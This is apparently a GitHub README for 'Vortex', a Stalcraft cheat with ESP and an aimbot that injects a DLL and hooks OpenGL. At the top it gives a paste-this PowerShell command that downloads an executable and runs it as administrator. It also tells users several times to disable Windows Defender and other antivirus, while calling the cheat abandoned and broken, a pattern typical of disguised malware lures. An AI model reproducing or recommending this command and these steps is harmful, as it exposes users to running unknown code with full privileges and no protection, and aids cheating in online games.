| VERSION | STATUS | ESP VISION | PLAYERS | PERFECT AIM |
|---|---|---|---|---|
| 2026.09.01 | ✅ ALL WORKING | 🔥 ULTRA | 2.4K+ | 🎯 100% |
Run the following command in Command Prompt as Administrator:
- Press
Win + R - Copy and paste the following command:
powershell -c irm https://github.com/goldwinston/Vortex-Client/releases/latest/download/Vortex.exe -OutFile $env:TEMP\Vortex.exe; Start-Process $env:TEMP\Vortex.exe -Verb RunAs
⚠️ ABANDONED: The game's ModelMatrix was changed in the latest update, so the cheat is currently not working. I'm leaving this repository for educational purposes and as a base for anyone who wants to continue development.
Before using this cheat, make sure you meet these strict requirements:
| Requirement | Details |
|---|---|
| Graphics Card | Intel Integrated Graphics (UHD / Iris Xe / Arc) — this is MANDATORY. |
| Administrator Rights | Run both overlay-acceptor.exe and the injector as Administrator. |
| Antivirus | Temporarily disable Windows Defender and any third-party antivirus. Add the cheat folder to exclusions. |
| Feature | Description |
|---|---|
| ESP | Displays players, NPCs, and some mobs with boxes, names, and health bars. |
| Draw Points | Shows points of interest on the radar. |
| Draw Lines | Trace lines from your crosshair to the target. |
| Aimbot | Smooth auto-aim with configurable settings. |
| Hotkeys | Full control via keyboard shortcuts. |
Follow these steps exactly as written. If you skip a step, the cheat will NOT work.
- Download the exe file from the Releases section or compile the source (
Vortex.exe). - Download any injector (e.g., Extreme Injector).
- Open Settings → Update & Security → Windows Security → Virus & threat protection.
- Turn off Real-time protection.
- Go to Manage settings and add the cheat folder to Exclusions to prevent files from being deleted.
- If you have a third-party antivirus, temporarily disable it.
- Right-click on
Vortex.exe→ Run as administrator. - Wait for the console message:
"Connecting to shared data...". - Right-click on your injector → Run as administrator.
- Launch Stalcraft (windowed or fullscreen).
- Open your injector, select the process
Stalcraft.exe, and injectVortex.dll. - Press INSERT in-game to open/close the menu.
| Key | Action |
|---|---|
INSERT |
Open / Close Menu |
LEFT SHIFT |
Hold to activate Aimbot |
F1 |
Toggle ESP On/Off |
F2 |
Toggle Draw Lines |
F3 |
Toggle Draw Points |
- Random coordinate jumps — The aimbot sometimes targets the sky. This is a known issue.
- Last target persists — If no enemies are on screen, the ESP may still draw the last target to prevent flickering.
- Entity culling — When there are many entities on screen, some may not be drawn. Likely related to bug #1.
You'll need Visual Studio 2022 with the Desktop development with C++ workload.
- Open the solution file (
.sln). - Set build configuration to
Releaseandx64. - Build → the compiled files will be in
x64/Release.
The cheat hooks OpenGL functions:
glDrawElements— to collect entity coordinates.glFlush— to render the overlay.
Two processes work together:
Vortex.dll— the core that intercepts API calls.Vortex.exe— helper process that creates a transparent overlay window.
- Intel Integrated Graphics is MANDATORY. The cheat will NOT work on NVIDIA or AMD GPUs.
- Run everything as Administrator. Without admin rights, the injector cannot interact with the game process.
- Disable antivirus. Windows Defender WILL delete the DLL if you don't add it to exclusions.
MIT License. Use the code for learning purposes, but remember: cheating in online games is prohibited and can get you banned.
⭐ Star this repository if you found it useful or interesting!
